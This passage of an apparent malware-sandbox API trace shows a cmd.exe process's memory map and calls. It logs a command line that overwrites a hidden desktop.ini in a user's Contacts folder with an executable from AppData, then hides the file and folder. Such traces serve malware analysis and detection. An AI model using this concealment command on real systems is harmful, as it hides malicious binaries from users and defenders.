pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32517 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32518 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32543 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32544 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32545 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32546 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 32547 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 32548 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32549 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32550 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32551 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name 
= "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32552 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32553 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32554 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32555 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32556 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32557 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 32558 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32559 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32560 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 32561 start_va = 0x60000 end_va = 0x61fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 32562 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 32563 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 32564 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 32565 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 32566 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Region: id = 32591 start_va = 0x1260000 end_va = 0x152efff entry_point = 0x1260000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 765 os_tid = 0xbc4 [0217.925] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fbdc | out: lpSystemTimeAsFileTime=0x16fbdc*(dwLowDateTime=0xb6b0a6a0, dwHighDateTime=0x1d440a9)) [0217.925] GetCurrentProcessId () returned 0xe3c [0217.925] GetCurrentThreadId () returned 0xbc4 [0217.925] GetTickCount () returned 0x3ce84 [0217.925] QueryPerformanceCounter (in: lpPerformanceCount=0x16fbd4 | out: lpPerformanceCount=0x16fbd4*=27471423762) returned 1 [0217.926] GetModuleHandleA (lpModuleName=0x0) returned 0x49fd0000 [0217.926] __set_app_type (_Type=0x1) [0217.926] __p__fmode () returned 0x76b331f4 [0217.926] __p__commode () returned 0x76b331fc [0217.926] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ff21a6) returned 0x0 [0217.926] __getmainargs (in: _Argc=0x49ff4238, _Argv=0x49ff4240, _Env=0x49ff423c, _DoWildCard=0, 
_StartInfo=0x49ff4140 | out: _Argc=0x49ff4238, _Argv=0x49ff4240, _Env=0x49ff423c) returned 0 [0217.928] GetCurrentThreadId () returned 0xbc4 [0217.928] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbc4) returned 0x38 [0217.928] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0217.928] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0217.928] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.928] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0217.928] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fb6c | out: phkResult=0x16fb6c*=0x0) returned 0x2 [0217.928] VirtualQuery (in: lpAddress=0x16fba3, lpBuffer=0x16fb3c, dwLength=0x1c | out: lpBuffer=0x16fb3c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0217.928] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fb3c, dwLength=0x1c | out: lpBuffer=0x16fb3c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0217.929] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fb3c, dwLength=0x1c | out: lpBuffer=0x16fb3c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0217.929] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fb3c, dwLength=0x1c | out: lpBuffer=0x16fb3c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0217.929] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fb3c, dwLength=0x1c | out: lpBuffer=0x16fb3c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, 
RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0217.929] GetConsoleOutputCP () returned 0x1b5 [0217.929] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0217.929] SetConsoleCtrlHandler (HandlerRoutine=0x49fee72a, Add=1) returned 1 [0217.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.929] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0217.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.929] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ff41ac | out: lpMode=0x49ff41ac) returned 1 [0217.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.929] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0217.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.930] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ff41b0 | out: lpMode=0x49ff41b0) returned 1 [0217.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0217.930] GetEnvironmentStringsW () returned 0x210418* [0217.930] FreeEnvironmentStringsW (penv=0x210418) returned 1 [0217.930] GetEnvironmentStringsW () returned 0x210418* [0217.931] FreeEnvironmentStringsW (penv=0x210418) returned 1 [0217.931] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eadc | out: phkResult=0x16eadc*=0x40) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x0, lpData=0x16eae8*=0xc8, lpcbData=0x16eae0*=0x1000) returned 0x2 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x4, lpData=0x16eae8*=0x1, lpcbData=0x16eae0*=0x4) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", 
lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x0, lpData=0x16eae8*=0x1, lpcbData=0x16eae0*=0x1000) returned 0x2 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x4, lpData=0x16eae8*=0x0, lpcbData=0x16eae0*=0x4) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x4, lpData=0x16eae8*=0x40, lpcbData=0x16eae0*=0x4) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x4, lpData=0x16eae8*=0x40, lpcbData=0x16eae0*=0x4) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x0, lpData=0x16eae8*=0x40, lpcbData=0x16eae0*=0x1000) returned 0x2 [0217.931] RegCloseKey (hKey=0x40) returned 0x0 [0217.931] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eadc | out: phkResult=0x16eadc*=0x40) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x0, lpData=0x16eae8*=0x40, lpcbData=0x16eae0*=0x1000) returned 0x2 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x4, lpData=0x16eae8*=0x1, lpcbData=0x16eae0*=0x4) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, 
lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x0, lpData=0x16eae8*=0x1, lpcbData=0x16eae0*=0x1000) returned 0x2 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x4, lpData=0x16eae8*=0x0, lpcbData=0x16eae0*=0x4) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x4, lpData=0x16eae8*=0x9, lpcbData=0x16eae0*=0x4) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x4, lpData=0x16eae8*=0x9, lpcbData=0x16eae0*=0x4) returned 0x0 [0217.931] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eae4, lpData=0x16eae8, lpcbData=0x16eae0*=0x1000 | out: lpType=0x16eae4*=0x0, lpData=0x16eae8*=0x9, lpcbData=0x16eae0*=0x1000) returned 0x2 [0217.931] RegCloseKey (hKey=0x40) returned 0x0 [0217.931] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b3 [0217.931] srand (_Seed=0x5b8863b3) [0217.931] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"" [0217.931] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h 
\"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"" [0217.932] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.932] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x211b78, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0217.932] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0217.932] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.932] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0217.932] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0217.932] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0217.932] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0217.932] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0217.932] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0217.932] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0217.932] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0217.932] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0217.932] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0217.933] GetEnvironmentStringsW () returned 0x212568* [0217.933] FreeEnvironmentStringsW (penv=0x212568) returned 1 [0217.933] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.933] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a000640, nSize=0x2000 | 
out: lpBuffer="") returned 0x0 [0217.933] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0217.933] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0217.933] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0217.933] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0217.933] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0217.933] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0217.933] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0217.933] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0217.933] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f8a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.933] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f8a8, lpFilePart=0x16f8a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f8a4*="Desktop") returned 0x18 [0217.933] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0217.933] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f624 | out: lpFindFileData=0x16f624) returned 0x210bf8 [0217.934] FindClose (in: hFindFile=0x210bf8 | out: hFindFile=0x210bf8) returned 1 [0217.934] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f624 | out: lpFindFileData=0x16f624) returned 0x210bf8 [0217.934] FindClose (in: hFindFile=0x210bf8 | out: hFindFile=0x210bf8) returned 1 [0217.934] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f624 | out: lpFindFileData=0x16f624) returned 0x210bf8 [0217.934] FindClose (in: hFindFile=0x210bf8 | out: hFindFile=0x210bf8) returned 1 [0217.934] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0217.934] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 
"c:\\users\\eebsym5\\desktop")) returned 1 [0217.934] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0217.934] GetEnvironmentStringsW () returned 0x210418* [0217.935] FreeEnvironmentStringsW (penv=0x210418) returned 1 [0217.935] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.935] GetConsoleOutputCP () returned 0x1b5 [0217.935] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0217.935] GetUserDefaultLCID () returned 0x409 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ff4950, cchData=8 | out: lpLCData=":") returned 2 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f9e8, cchData=128 | out: lpLCData="0") returned 2 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f9e8, cchData=128 | out: lpLCData="0") returned 2 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f9e8, cchData=128 | out: lpLCData="1") returned 2 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ff4940, cchData=8 | out: lpLCData="/") returned 2 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ff4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ff4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ff4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ff4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ff4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ff4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0217.936] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x37, lpLCData=0x49ff4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ff4930, cchData=8 | out: lpLCData=".") returned 2 [0217.936] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ff4920, cchData=8 | out: lpLCData=",") returned 2 [0217.936] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0217.937] GetConsoleTitleW (in: lpConsoleTitle=0x200a70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.937] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0217.938] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0217.938] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0217.938] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0217.939] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0217.939] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0217.939] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0217.939] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0217.939] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0217.939] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0217.939] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0217.941] _wcsicmp (_String1="del", _String2=")") returned 59 [0217.941] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0217.941] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0217.941] _wcsicmp (_String1="IF", _String2="del") returned 5 [0217.941] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0217.941] _wcsicmp (_String1="REM", _String2="del") returned 14 [0217.941] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0217.943] _wcsicmp (_String1="type", _String2=")") returned 75 [0217.943] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0217.943] _wcsicmp 
(_String1="FOR/?", _String2="type") returned -14 [0217.943] _wcsicmp (_String1="IF", _String2="type") returned -11 [0217.943] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0217.943] _wcsicmp (_String1="REM", _String2="type") returned -2 [0217.943] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0217.946] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0217.946] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0217.946] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0217.946] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0217.946] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0217.946] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0218.007] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0218.007] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0218.012] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.013] FindClose (in: hFindFile=0x2124e8 | out: hFindFile=0x2124e8) returned 1 [0218.013] FindClose (in: hFindFile=0x2124e8 | out: hFindFile=0x2124e8) returned 1 [0218.013] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0218.014] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0218.014] GetConsoleTitleW (in: lpConsoleTitle=0x16f410, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.014] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f298, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f360 | out: lpAttributeList=0x16f298, lpSize=0x16f360) returned 1 [0218.014] UpdateProcThreadAttribute (in: lpAttributeList=0x16f298, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f358, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 
| out: lpAttributeList=0x16f298, lpPreviousValue=0x0) returned 1 [0218.014] GetStartupInfoW (in: lpStartupInfo=0x16f254 | out: lpStartupInfo=0x16f254*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0218.014] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0218.015] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x16f2f4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f340 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" ", lpProcessInformation=0x16f340*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa20, dwThreadId=0x64)) returned 1 [0218.029] CloseHandle (hObject=0x4c) returned 1 [0218.029] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0218.029] GetEnvironmentStringsW () returned 0x210838* [0218.029] FreeEnvironmentStringsW (penv=0x210838) returned 1 [0218.029] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0218.153] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x16f234 | out: lpExitCode=0x16f234*=0x0) returned 1 [0218.153] CloseHandle (hObject=0x50) returned 1 [0218.153] _vsnwprintf (in: 
